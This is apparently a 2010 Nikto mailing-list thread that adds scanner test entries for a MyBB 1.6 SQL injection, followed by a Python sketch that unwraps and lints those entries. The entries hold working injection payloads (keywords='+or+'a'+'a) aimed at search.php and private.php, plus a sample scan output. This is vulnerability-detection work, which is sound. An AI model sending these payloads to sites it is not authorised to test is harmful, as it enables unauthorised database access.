[Nikto-discuss] [db_tests] new entry - myBB SQL Injection
Sullo
csullo at gmail.com
Thu Dec 23 22:11:21 CST 2010
Added these, thanks!
On Thu, Dec 23, 2010 at 1:34 PM, YGN Ethical Hacker Group <lists at yehg.net> wrote:
> udb_tests
> =========
>
> "400000","0","9","/search.php","POST","MyBB has experienced an internal SQL
> error and cannot continue.","","","Sorry, but no results were
> returned","","MyBB 1.6 <= SQL Injection, ref:
> http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
> ","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1",""
>
> "400001","0","9","/private.php","POST","MyBB has experienced an internal
> SQL error and cannot continue.","","","Sorry, but no results were
> returned","","MyBBx 1.6 <= SQL Injection, ref:
> http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
> ","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff",""
>
>
> Testing
> ========
>
>
> >perl nikto.pl -h http://attacker.in -root /mybb -useproxy
>
> + Target Port: 80
> + Proxy: localhost:8080
> + Start Time: 2010-12-25 02:28:34
> ---------------------------------------------------------------------------
> + Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a
> mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
> DAV/2
> + /search.php: MyBB 1.6 <= SQL Injection, ref:
> http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
> + 2 items checked: 0 error(s) and 1 item(s) reported on remote host
> + End Time: 2010-12-25 02:28:52 (18 seconds)
> ---------------------------------------------------------------------------
> + 1 host(s) tested
>
>
> ---------------------------------
> Best regards,
> YGN Ethical Hacker Group
> Yangon, Myanmar
> http://yehg.net
> Our Lab | http://yehg.net/lab
> Our Directory | http://yehg.net/hwd
--
http://www.cirt.net | http://www.osvdb.org/
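
Entries copied out of a wrapped, quoted e-mail like the one above span several lines and have to be rejoined before they go into a udb_tests file. The following is an added sketch, not Nikto's or the poster's code, that unwraps and lints such entries; the column names and the 400000-499999 user-test ID range are assumptions based on Nikto 2's db_tests conventions and are not stated in this thread.

```python
import csv

# Column order assumed from the header comment of Nikto 2's db_tests file.
FIELDS = ("id", "osvdb", "tuning", "uri", "method", "match_1", "match_1_or",
          "match_1_and", "fail_1", "fail_2", "summary", "data", "headers")

# First entry from the quoted post, wrapped and ">"-prefixed as archived
# (the duplicate <http://...> link appended by the archiver is left out).
QUOTED = """\
> "400000","0","9","/search.php","POST","MyBB has experienced an internal SQL
> error and cannot continue.","","","Sorry, but no results were
> returned","","MyBB 1.6 <= SQL Injection, ref:
> http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
> ","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1",""
"""

def unwrap(quoted):
    """Strip '>' quoting and rejoin mail-wrapped lines into parsed entries."""
    entries, buf = [], ""
    for raw in quoted.splitlines():
        line = raw.lstrip("> ").strip()
        if not line:
            continue
        buf = f"{buf} {line}" if buf else line
        if buf.count('"') % 2:          # odd count: still inside a quoted field
            continue
        row = [f.strip() for f in next(csv.reader([buf]))]
        if len(row) > len(FIELDS):
            raise ValueError(f"too many fields: {buf[:40]}")
        if len(row) == len(FIELDS):     # a full 13-column entry has been rebuilt
            entries.append(dict(zip(FIELDS, row)))
            buf = ""
    if buf:
        raise ValueError(f"incomplete entry: {buf[:40]}")
    return entries

def lint(entry):
    """Return a list of problems that would make the check unreliable."""
    problems = []
    if not entry["id"].isdigit():
        problems.append("id is not numeric")
    elif not 400000 <= int(entry["id"]) <= 499999:   # assumed user-test range
        problems.append("id outside the range assumed for user tests")
    if not entry["match_1"]:
        problems.append("no match string")
    if entry["method"] == "POST" and not entry["data"]:
        problems.append("POST test without a request body")
    return problems
```
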